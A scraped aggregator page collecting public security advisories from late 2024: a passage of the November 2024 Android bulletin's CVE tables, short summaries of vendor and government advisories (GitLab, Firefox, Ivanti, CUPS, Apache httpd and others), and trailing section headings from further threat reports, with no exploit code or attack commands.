The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed. CVE References Type Severity Updated AOSP versions CVE-2024-43091 A-344620577 RCE High 12, 12L, 13, 14, 15 CVE-2024-29779 A-329701910 EoP High 14 CVE-2024-34719 A-242996380 EoP High 12, 12L, 13, 14 CVE-2024-40661 A-308138085 EoP High 12, 12L, 13, 14 CVE-2024-43080 A-330722900 EoP High 12, 12L, 13, 14, 15 CVE-2024-43087 A-353700779 EoP High 12, 12L, 13, 14, 15 CVE-2024-43088 A-326057017 EoP High 12, 12L, 13, 14, 15 CVE-2024-43089 A-304280682 EoP High 12, 12L, 13, 14, 15 CVE-2024-43090 A-331180422 ID High 12, 12L, 13, 14 CVE-2024-43083 A-348352288 DoS High 12, 12L, 13, 14, 15 Google Play system updates

The following issues are included in Project Mainline components. Subcomponent CVE Documents UI CVE-2024-43093 MediaProvider CVE-2024-43089 Permission Controller CVE-2024-40661 WiFi CVE-2024-43083 2024-11-05 security patch level vulnerability details

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-11-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Kernel

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. CVE References Type Severity Subcomponent CVE-2024-36978 A-349777785 Upstream kernel [2] EoP High Net CVE-2024-46740 A-352520660 Upstream kernel [2] [3] [4] [5] [6] [7] [8] EoP High Binder Kernel LTS

The following kernel versions have been updated. Kernel version updates are dependent on the version of Android OS at the time of device launch. References Android Launch Version Kernel Launch Version Minimum Update Version A-348473863 12 5.4 5.4.274 A-348681334 12 4.19 4.19.312 Imagination Technologies

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies. CVE References Severity Subcomponent CVE-2024-34747 A-346643520 * High PowerVR-GPU CVE-2024-40671 A-355477536 * High PowerVR-GPU Imagination Technologies

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies. CVE References Severity Subcomponent CVE-2023-35659 A-350006107 * High PowerVR-GPU CVE-2023-35686 A-350527097 * High PowerVR-GPU CVE-2024-23715 A-350530745 * High PowerVR-GPU CVE-2024-31337 A-337944529 * High PowerVR-GPU CVE-2024-34729 A-331437862 * High PowerVR-GPU MediaTek components

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. CVE References Severity Subcomponent CVE-2024-21455 A-357616450 QC-CR#3839449 [2] QC-CR#3875202 [2] High Kernel CVE-2024-38402 A-364017423 QC-CR#3890158 High Kernel CVE-2024-38405 A-357615761 QC-CR#3754687 High WLAN CVE-2024-38415 A-357616194 QC-CR#3775520 [2] High Camera CVE-2024-38421 A-357616018 QC-CR#3793941 High Display CVE-2024-38422 A-357616000 QC-CR#3794268 [2] [3] High Audio CVE-2024-38423 A-357615775 QC-CR#3799033 High Display CVE-2024-43047 A-364017103 QC-CR#3883647 High Kernel Qualcomm closed-source components

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm. CVE References Severity Subcomponent CVE-2024-38408 A-357615875 * Critical Closed-source component CVE-2024-23385 A-339043003 * High Closed-source component CVE-2024-38403 A-357615948 * High Closed-source component CVE-2024-38424 A-357616230 * High Closed-source component Common questions and answers

This section answers common questions that may occur after reading this bulletin.

How do I determine if my device is updated to address these issues?

To learn how to check a device's security patch level, see Check and update your Android version.

Security patch levels of 2024-11-01 or later address all issues associated with the 2024-11-01 security patch level.
Security patch levels of 2024-11-05 or later address all issues associated with the 2024-11-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

[ro.build.version.security_patch]:[2024-11-01]
[ro.build.version.security_patch]:[2024-11-05]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2024-11-01 security patch level. Please see this article for more details on how to install security updates.

Why does this bulletin have two security patch levels?

Devices that use the 2024-11-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
Devices that use the security patch level of 2024-11-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

What do the entries in the Type column mean?

What do the entries in the References column mean?

What does an * next to the Android bug ID in the References column mean?

Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?

HPE Aruba Networking Product Security Advisory - HPESBNW04722 - 05-Nov-2024

4 months ago by Alexandre Dulaunoy

HPE Aruba Networking has released software patches for Access Points running Instant AOS-8 and AOS-10 that address multiple security vulnerabilities.

Reference - https://csaf.arubanetworks.com/2024/hpearubanetworking-hpesbnw04722.txt

Security Vulnerabilities fixed in Firefox 132

4 months ago by Cédric Bonhomme

Mozilla Foundation Security Advisory 2024-55 Security Vulnerabilities fixed in Firefox 132

Security Advisory: https://www.mozilla.org/en-US/security/advisories/mfsa2024-55/

CVE-2024-10458: Permission leak via embed or object elements
CVE-2024-10459: Use-after-free in layout with accessibility
CVE-2024-10460: Confusing display of origin for external protocol handler prompt
CVE-2024-10461: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response
CVE-2024-10462: Origin of permission prompt could be spoofed by long URL
CVE-2024-10463: Cross origin video frame leak
CVE-2024-10468: Race conditions in IndexedDB
CVE-2024-10464: History interface could have been used to cause a Denial of Service condition in the browser
CVE-2024-10465: Clipboard "paste" button persisted across tabs
CVE-2024-10466: DOM push subscription message could hang Firefox
CVE-2024-10467: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4

NVIDIA GPU Display Driver

5 months ago by Cédric Bonhomme

NVIDIA has released a software security update for NVIDIA GPU Display Driver to address various issues.

CVE‑2024‑0126 - "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability which could allow a privileged attacker to escalate permissions. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering."

Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA

5 months ago by Alexandre Dulaunoy

Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA | FortiGuard Labs

Reference: https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa

Affected Platforms: Ivanti Cloud Services Appliance version 4.6 and prior Impacted Users: Any organization Impact: Remote attackers gain control of the vulnerable systems Severity Level: Critical

Today FortiGuard Labs is releasing this blog post about a case where an advanced adversary was observed exploiting three vulnerabilities affecting the Ivanti Cloud Services Appliance (CSA). At the time of our investigation, two out of the three identified vulnerabilities were not publicly known. This incident is a prime example of how threat actors chain zero-day vulnerabilities to gain initial access to a victim’s network. Background

In a recent incident response engagement, FortiGuard Incident Response (FGIR) services were engaged by a customer to investigate malicious communication originating from their network. During the investigation, FGIR came across an adversary who had gained access to the customer’s network by exploiting the CVE-2024-8190 and two previously unknown vulnerabilities affecting the PHP front end of the Ivanti CSA appliance.

Related vulnerabilities: cve-2024-29824 cve-2024-9380 cve-2024-8190 cve-2024-8963

Update on SVR Cyber Operations and Vulnerability Exploitation

5 months ago by Alexandre Dulaunoy

The Federal Bureau of Investigation (FBI), the National Security Agency (NSA), Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to highlight the tactics, techniques, and procedures (TTPs) employed by the Russian Federation’s Foreign Intelligence Service (SVR) in recent cyber operations and provide network defenders with information to help counter SVR cyber threats. Since at least 2021, Russian SVR cyber actors – also tracked as APT29, Midnight Blizzard (formerly Nobelium), Cozy Bear, and the Dukes– have consistently targeted US, European, and global entities in the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations, including in support of Russia’s ongoing invasion of Ukraine since February 2022. Their operations continue to pose a global threat to government and private sector organization

The authoring agencies are releasing this CSA to warn network defenders that SVR cyber actors are highly capable of and interested in exploiting software vulnerabilities for initial access [T1190] and escalation of privileges [T1068]. Organizations should prioritize rapid patch deployment and keep software up to date. The SVR continues using TTPs such as spearphishing [T1566], password spraying [T1078], abuse of supply chain [T1195] and trusted relationships [T1199], custom and bespoke malware, cloud exploitation, and living-off-the-land techniques to gain initial access, escalate privileges, move laterally, maintain persistence in victim networks and cloud environments, and exfiltrate information. SVR actors often use The Onion Router (TOR) network, leased and compromised infrastructure, and proxies to obfuscate activity.

Ref: PDF - Update on SVR Cyber Operations and Vulnerability Exploitation

GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9

5 months ago by Alexandre Dulaunoy

GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9 Nikhil George 8–10 minutes

Learn more about GitLab Critical Patch Release: 17.4.2, 17.3.5, 17.2.9 for GitLab Community Edition (CE) and Enterprise Edition (EE).

Today we are releasing versions 17.4.2, 17.3.5, 17.2.9 for GitLab Community Edition (CE) and Enterprise Edition (EE).

These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. GitLab.com is already running the patched version. GitLab Dedicated customers do not need to take action.

GitLab releases fixes for vulnerabilities in patch releases. There are two types of patch releases: scheduled releases, and ad-hoc critical patches for high-severity vulnerabilities. Scheduled releases are released twice a month on the second and fourth Wednesdays. For more information, you can visit our releases handbook and security FAQ. You can see all of GitLab release blog posts here.

For security fixes, the issues detailing each vulnerability are made public on our issue tracker 30 days after the release in which they were patched.

We are committed to ensuring all aspects of GitLab that are exposed to customers or that host customer data are held to the highest security standards. As part of maintaining good security hygiene, it is highly recommended that all customers upgrade to the latest patch release for their supported version. You can read more best practices in securing your GitLab instance in our blog post. Recommended Action

We strongly recommend that all installations running a version affected by the issues described below are upgraded to the latest version as soon as possible.

When no specific deployment type (omnibus, source code, helm chart, etc.) of a product is mentioned, this means all types are affected. Security fixes Table of security fixes Title Severity Run pipelines on arbitrary branches Critical An attacker can impersonate arbitrary user High SSRF in Analytics Dashboard High Viewing diffs of MR with conflicts can be slow High HTMLi in OAuth page High Deploy Keys can push changes to an archived repository Medium Guests can disclose project templates Medium GitLab instance version disclosed to unauthorized users Low Run pipelines on arbitrary branches

An issue was discovered in GitLab EE affecting all versions starting from 12.5 prior to 17.2.9, starting from 17.3, prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows running pipelines on arbitrary branches. This is a critical severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). It is now mitigated in the latest release and is assigned CVE-2024-9164.

Thanks pwnie for reporting this vulnerability through our HackerOne bug bounty program. An attacker can impersonate arbitrary user

An issue was discovered in GitLab CE/EE affecting all versions starting from 11.6 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows an attacker to trigger a pipeline as another user under certain circumstances. This is a high severity issue (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N, 8.2). It is now mitigated in the latest release and is assigned CVE-2024-8970.

Thanks yvvdwf for reporting this vulnerability through our HackerOne bug bounty program. SSRF in Analytics Dashboard

An issue has been discovered in GitLab EE affecting all versions starting from 15.10 prior to 17.2.9, from 17.3 prior to 17.3.5, and from 17.4 prior to 17.4.2. Instances with Product Analytics Dashboard configured and enabled could be vulnerable to SSRF attacks. This is a high severity issue (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N, 8.2). It is now mitigated in the latest release and is assigned CVE-2024-8977.

Thanks joaxcar for reporting this vulnerability through our HackerOne bug bounty program. Viewing diffs of MR with conflicts can be slow

An issue was discovered in GitLab CE/EE affecting all versions starting from 13.6 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, were viewing diffs of MR with conflicts can be slow. This is a high severity issue (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, 7.5). It is now mitigated in the latest release and is assigned CVE-2024-9631.

Thanks a92847865 for reporting this vulnerability through our HackerOne bug bounty program. HTMLi in OAuth page

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 17.1 prior 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2. When authorising a new application, it can be made to render as HTML under specific circumstances. This is a high severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N, 7.3). It is now mitigated in the latest release and is assigned CVE-2024-6530.

Thanks joaxcar for reporting this vulnerability through our HackerOne bug bounty program. Deploy Keys can push changes to an archived repository

An issue was discovered in GitLab CE/EE affecting all versions starting from 8.16 prior to 17.2.9, starting from 17.3 prior to 17.3.5, and starting from 17.4 prior to 17.4.2, which allows deploy keys to push to an archived repository. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N, 4.9). It is now mitigated in the latest release and is assigned CVE-2024-9623.

Thanks stevenorman for reporting this vulnerability. Guests can disclose project templates

An issue has been discovered discovered in GitLab EE/CE affecting all versions starting from 11.4 before 17.2.9, all versions starting from 17.3 before 17.3.5, all versions starting from 17.4 before 17.4.2 It was possible for guest users to disclose project templates using the API. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, 4.3). It is now mitigated in the latest release and is assigned CVE-2024-5005.

Thanks js_noob for reporting this vulnerability through our HackerOne bug bounty program. GitLab instance version disclosed to unauthorized users

An issue has been discovered in GitLab EE affecting all versions starting from 16.6 prior to 17.2.9, from 17.3 prior to 17.3.5, and from 17.4 prior to 17.4.2. It was possible for an unauthenticated attacker to determine the GitLab version number for a GitLab instance. This is a low severity issue (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N, 3.7). It is now mitigated in the latest release and is assigned CVE-2024-9596.

This issue was discovered internally by GitLab team member Paul Gascou-Vaillancourt. Bug fixes 17.4.2

Backport: fix: Specify an absolute directory for SCHEMA_VERSIONS_DIR to 17-4-stable
Backport grpc-go v1.67.1 upgrade to 17.4
Update expected vulnerability in enable_advanced_sast_spec.rb
Skip multi-version upgrade job for stable branch MRs
Backport 17.4 Fix label filter by name for search
Restrict duo pro assignment email to duo pro for sm
Drop project_id not null constraint ci_deleted_objects
[Backport] Go-get: fix 401 error for unauthenticated requests

17.3.5

Backport: fix: Specify an absolute directory for SCHEMA_VERSIONS_DIR to 17-3-stable
Backport: fix: Allow non-root user to run the bundle-certificates script 17.3
Skip multi-version upgrade job for stable branch MRs
Ensure restricted visibility levels is an array - 17.3 backport

17.2.9

Skip multi-version upgrade job for stable branch MRs
Ensure restricted visibility levels is an array - 17.2 backport

Updating

To update GitLab, see the Update page. To update Gitlab Runner, see the Updating the Runner page. Receive Patch Notifications

To receive patch blog notifications delivered to your inbox, visit our contact us page. To receive release notifications via RSS, subscribe to our patch release RSS feed or our RSS feed for all releases. We’re combining patch and security releases

This improvement in our release process matches the industry standard and will help GitLab users get information about security and bug fixes sooner, read the blog post here.

Security Vulnerability fixed in Firefox 131.0.2, Firefox ESR 128.3.1, Firefox ESR 115.16.1

5 months ago by Cédric Bonhomme

The vulnerability, tracked as CVE-2024-9680, and discovered by ESET researcher Damien Schaeffer, is a use-after-free in Animation timelines.

"An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild."

A patch has been made available on Tue, 08 Oct 2024 16:25:12 +0000.

Related vulnerabilities: cve-2024-9680

Ivanti - October Security Update + Counter Feedback

5 months ago by Alexandre Dulaunoy

Ivanti original security advisory

¨"At Ivanti, our top priority is upholding our commitment to deliver and maintain secure products for our customers"". Our vulnerability management program is designed to enable us to find, fix and disclose vulnerabilities in collaboration with the broader security ecosystem, and communicate responsibly and transparently with customers.

In recent months, we have intensified our internal scanning, manual exploitation and testing capabilities, and have additionally made improvements to our responsible disclosure process so that we can promptly discover and address potential issues.

Ivanti is making a large investment in Secure by Design across our organization and signed the CISA Secure by Design pledge in May. You can follow along with our progress here.

Today, fixes have been released for the following Ivanti solutions: Ivanti Endpoint Manager Mobile (EPMM), Ivanti Cloud Service Application (CSA), Ivanti Velocity License Server, Ivanti Connect Secure and Policy Secure, and Ivanti Avalanche.

It is important for customers to know:

We are aware of a limited number of customers running CSA 4.6 patch 518 and prior who have been exploited when CVE-2024-9379 or CVE-2024-9380 are chained with CVE-2024-8963. We have not observed these vulnerabilities being exploited in any version of CSA 5.0.
We have no evidence of any other vulnerabilities being exploited in the wild.
These vulnerabilities do not impact any other Ivanti products or solutions.

More information on these vulnerabilities and detailed instructions on how to remediate the issues can be found in these Security Advisories:

Ivanti EPMM
Ivanti CSA
Ivanti Velocity License Server
Ivanti Avalanche
Ivanti Connect Secure/Policy Secure

Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required).

Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

Original source: https://www.ivanti.com/blog/october-2024-security-update

Counter analysis from @screaminggoat@infosec.exchange

Ivanti Security Advisory: Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
 Very sneaky of Ivanti to quietly update the security advisory without a changelog: They removed CVE-2024-9381 (CVSSv3: 7.2 high) Path traversal in Ivanti CSA before version 5.0.2 from the exploitation announcement:

Original source: https://social.circl.lu/@screaminggoat@infosec.exchange/113278926244627512

Related vulnerabilities: cve-2024-9379 cve-2024-9380 cve-2024-8963 cve-2024-9381

CUPS Vulnerabilities - 2024

5 months ago by Alexandre Dulaunoy

Following the initial research available at the Attacking UNIX Systems via CUPS, Part I done by evilsocket.net.

OpenPrinting Vendor Fixes

CVE-2024-47176: cups-browsed binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a get-printer-attributes IPP request to an attacker-controlled URL (GHSA)
- Preliminary Fix cups-browsed
- Preliminary Fix cups-filters 1.x
CVE-2024-47076: cfGetPrinterAttributes5() (libcupsfilters 2.x) and get_printer_attributes5() (cups-filters 1.x) does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system (GHSA)
- Fix libcupsfilters 2.x
- Fix cups-filters 1.x
CVE-2024-47175: In libppd ppdCreatePPDFromIPP2() does not validate or sanitize the IPP attributes when writing them to the PPD file, allowing the injection of attacker-controlled data into the resulting PPD (GHSA)
CVE-2024-47177: cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter (GHSA)

The already available fixes are sufficient to prevent the exploit.

Additional vulnerabilities

CVE-2024-47850 - CUPS cups-browsed before 2.5b1 will send an HTTP POST request to an arbitrary destination and port in response to a single IPP UDP packet requesting a printer to be added, a different vulnerability than CVE-2024-47176. (The request is meant to probe the new printer but can be used to create DDoS amplification attacks.)

Additional reference

Red Hat’s response to OpenPrinting CUPS vulnerabilities: CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177

5 months ago by Alexandre Dulaunoy

TL;DR: All versions of Red Hat Enterprise Linux (RHEL) are affected by CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177, but are not vulnerable in their default configurations.

Red Hat has been made aware of a group of vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176 and CVE-2024-47177) within OpenPrinting CUPS, an open source printing system that is prevalent in most modern Linux distributions, including RHEL. Specifically, CUPS provides tools to manage, discover and share printers for Linux distributions. By chaining this group of vulnerabilities together, an attacker could potentially achieve remote code execution which could then lead to theft of sensitive data and/or damage to critical production systems.

Red Hat rates these issues with a severity impact of Important. While all versions of RHEL are affected, it is important to note that affected packages are not vulnerable in their default configuration. At this time, there are four CVEs assigned to these vulnerabilities, but the exact number is still being coordinated with the upstream community and the researcher who discovered the problem.

More details

Related vulnerabilities: cve-2024-47076 cve-2024-47176 cve-2024-47177 cve-2024-47175

People’s Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations

6 months ago by Alexandre Dulaunoy

The Federal Bureau of Investigation (FBI), Cyber National Mission Force (CNMF), and National Security Agency (NSA) assess that People’s Republic of China (PRC)-linked cyber actors have compromised thousands of Internet-connected devices, including small office/home office (SOHO) routers, firewalls, network-attached storage (NAS) and Internet of Things (IoT) devices with the goal of creating a network of compromised nodes (a “botnet”) positioned for malicious activity. The actors may then use the botnet as a proxy to conceal their identities while deploying distributed denial of service (DDoS) attacks or compromising targeted U.S. networks. Integrity Technology Group, a PRC-based company, has controlled and managed a botnet active since mid-

The botnet has regularly maintained between tens to hundreds of thousands of compromised devices. As of June 2024, the botnet consisted of over 260,000 devices. Victim devices part of the botnet have been observed in North America, South America, Europe, Africa, Southeast Asia and Australia. While devices aged beyond their end-of-life dates are known to be more vulnerable to intrusion, many of the compromised devices in the Integrity Tech controlled botnet are likely still supported by their respective vendors. FBI, CNMF, NSA, and allied partners are releasing this Joint Cyber Security Advisory to highlight the threat posed by these actors and their botnet activity and to encourage exposed device vendors, owners, and operators to update and secure their devices from being compromised and joining the botnet. Network defenders are advised to follow the guidance in the mitigations section to protect against the PRC-linked cyber actors’ botnet activity. Cyber security companies can also leverage the information in this advisory to assist with identifying malicious activity and reducing the number of devices present in botnets worldwide. For additional information, see U.S. Department of Justice (DOJ) press release.

https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF

Cisco Smart Licensing Utility

6 months ago by Jean-Louis Huynen

Two critical vulnerabilities in Cisco's Smart Licensing Utility allow remote, unauthenticated attackers to gain privileges or access sensitive data.

Vulnerabilities:

CVE-2024-20439 (CVSS: 9.8): An undocumented static admin account can be exploited to access affected systems.
CVE-2024-20440 (CVSS: 7.5): An overly verbose debug log can be exploited via a crafted HTTP request, exposing API credentials.

⚠️ These issues are only exploitable if the licensing utility is actively running. Cisco strongly advises updating systems to mitigate these threats.

Related vulnerabilities: cve-2024-20440 cve-2024-20439

Zyxel security advisory for multiple vulnerabilities in firewalls

6 months ago by Jean-Louis Huynen

Zyxel has released patches addressing multiple vulnerabilities in some firewall versions. Users are advised to install the patches for optimal protection.

Firewall series	CVE-2024-6343	CVE-2024-7203	CVE-2024-42057	CVE-2024-42058	CVE-2024-42059	CVE-2024-42060	CVE-2024-42061	Patch availability
ATP	ZLD V4.32 to V5.38	ZLD V4.60 to V5.38	ZLD V4.32 to V5.38	ZLD V4.32 to V5.38	ZLD V5.00 to V5.38	ZLD V4.32 to V5.38	ZLD V4.32 to V5.38	ZLD V5.39
USG FLEX	ZLD V4.50 to V5.38	ZLD V4.60 to V5.38	ZLD V4.50 to V5.38	ZLD V4.50 to V5.38	ZLD V5.00 to V5.38	ZLD V4.50 to V5.38	ZLD V4.50 to V5.38	ZLD V5.39
USG FLEX 50(W)/USG20(W)-VPN	ZLD V4.16 to V5.38	Not affected	ZLD V4.16 to V5.38	ZLD V4.20 to V5.38	ZLD V5.00 to V5.38	ZLD V4.16 to V5.38	ZLD V4.16 to V5.38	ZLD V5.39

ServiceNow - July 2024 vulnerabilities

7 months ago by Alexandre Dulaunoy

KB1648313 CVE-2024-5217 - Incomplete Input Validation in GlideExpression Script 2024-07-10
KB1648312 CVE-2024-5178 - Incomplete Input Validation in SecurelyAccess API 2024-07-10
KB1645154 CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow UI Macros 2024-07-10

CVE-2024-4879 sounds to be the most serious vulnerability allowing RCE for non-authenticated users.

ref: https://support.servicenow.com/kb?id=kbarticleview&sysparm_article=KB1226057

Related vulnerabilities: cve-2024-5217 cve-2024-5178 cve-2024-4879

Apache 2.4.60 vulnerabilities fixed

8 months ago by Alexandre Dulaunoy

A set of vulnerabilities discovered before version 2.4.59 and fixed in Apache httpd 2.4.60

SECURITY: CVE-2024-39573: Apache HTTP Server: modrewrite proxy handler substitution (cve.mitre.org) Potential SSRF in modrewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly setup URL's to be handled by modproxy. Credits: Orange Tsai (@orange8361) from DEVCORE
SECURITY: CVE-2024-38477: Apache HTTP Server: Crash resulting in Denial of Service in modproxy via a malicious request (cve.mitre.org) null pointer dereference in modproxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request. Credits: Orange Tsai (@orange_8361) from DEVCORE
SECURITY: CVE-2024-38476: Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect (cve.mitre.org) Vulnerability in core of Apache HTTP Server 2.4.59 and earlier are vulnerably to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable.

Note: Some legacy uses of the 'AddType' directive to connect a request to a handler must be ported to 'AddHandler' after this fix.

Credits: Orange Tsai (@orange_8361) from DEVCORE
SECURITY: CVE-2024-38475: Apache HTTP Server weakness in modrewrite when first segment of substitution matches filesystem path. (cve.mitre.org) Improper escaping of output in modrewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained. Credits: Orange Tsai (@orange_8361) from DEVCORE
SECURITY: CVE-2024-38474: Apache HTTP Server weakness with encoded question marks in backreferences (cve.mitre.org) Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL or source disclosure of scripts meant to only to be executed as CGI.

Note: Some RewriteRules that capture and substitute unsafely will now fail unless rewrite flag "UnsafeAllow3F" is specified.

Credits: Orange Tsai (@orange_8361) from DEVCORE
SECURITY: CVE-2024-38473: Apache HTTP Server proxy encoding problem (cve.mitre.org) Encoding problem in modproxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests. Credits: Orange Tsai (@orange8361) from DEVCORE
SECURITY: CVE-2024-38472: Apache HTTP Server on WIndows UNC SSRF (cve.mitre.org) SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content

Note: Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing.

Credits: Orange Tsai (@orange_8361) from DEVCORE
SECURITY: CVE-2024-36387: Apache HTTP Server: DoS by Null pointer in websocket over HTTP/2 (cve.mitre.org) Serving WebSocket protocol upgrades over a HTTP/2 connection could result in a Null Pointer dereference, leading to a crash of the server process, degrading performance. Credits: Marc Stern ()

Vulnerabilities fixed in Apache 2.4.59

8 months ago by Alexandre Dulaunoy

SECURITY: CVE-2024-27316: Apache HTTP Server: HTTP/2 DoS by memory exhaustion on endless continuation frames (cve.mitre.org) HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion. Credits: Bartek Nowotarski (https://nowotarski.info/)
SECURITY: CVE-2024-24795: Apache HTTP Server: HTTP Response Splitting in multiple modules (cve.mitre.org) HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.

Related vulnerabilities: cve-2024-36387 cve-2024-24795

Recent bundles

18 hours ago by Alexandre Dulaunoy

Operation ForumTroll exploits zero-days in Google Chrome | Securelist

Indicators of Compromise

Latest Posts

Latest Webinars

Reports

1 day ago by Alexandre Dulaunoy

13 days ago by Alexandre Dulaunoy

13 days ago by Cédric Bonhomme

15 days ago by Cédric Bonhomme

22 days ago by Alexandre Dulaunoy

Impacted Products

Introduction

23 days ago by Alexandre Dulaunoy

StopRansomware: Ghost (Cring) Ransomware | CISA

Actions for Organizations to Take Today to Mitigate Cyber Threats Related to Ghost (Cring) Ransomware Activity

Summary

Technical Details

Initial Access

Execution

Persistence

Privilege Escalation

Credential Access

Defense Evasion

Discovery

Lateral Movement

Exfiltration

Command and Control

Impact and Encryption

Indicators of Compromise (IOC)

Ransom Email Addresses

Ransom Notes

MITRE ATT&CK Tactics and Techniques

Mitigations

Validate Security Controls

Reporting

Disclaimer

Version History

Tags

26 days ago by Cédric Bonhomme

1 month ago by Cédric Bonhomme

1 month ago by Alexandre Dulaunoy

Resolution

1 month ago by Cédric Bonhomme

1 month ago by Cédric Bonhomme

1 month ago by Alexandre Dulaunoy

Key Takeaways

Summary

Background

What We Know About the Campaign

Phase 1: Vulnerability scanning

Web management HTTPS activity

Indications of opportunistic exploitation

Phase 2: Reconnaissance

Phase 3: SSL VPN configuration

Phase 4: Lateral Movement

How Arctic Wolf Protects Its Customers

Remediation

Conclusion

Acknowledgements

Appendix

Tactics, Techniques, and Procedures (TTPs)

Vulnerabilities Exploited

Indicators of Compromise (IoCs)

Detection Opportunities

Firewall

Additional Resources

About Arctic Wolf Labs

Authors

Stefan Hostetler

Julian Tuin

Trevor Daher

Jon Grimm

Alyssa Newbury

Joe Wedderspoon

Markus Neis

1 month ago by Alexandre Dulaunoy

PSIRT | FortiGuard Labs

Summary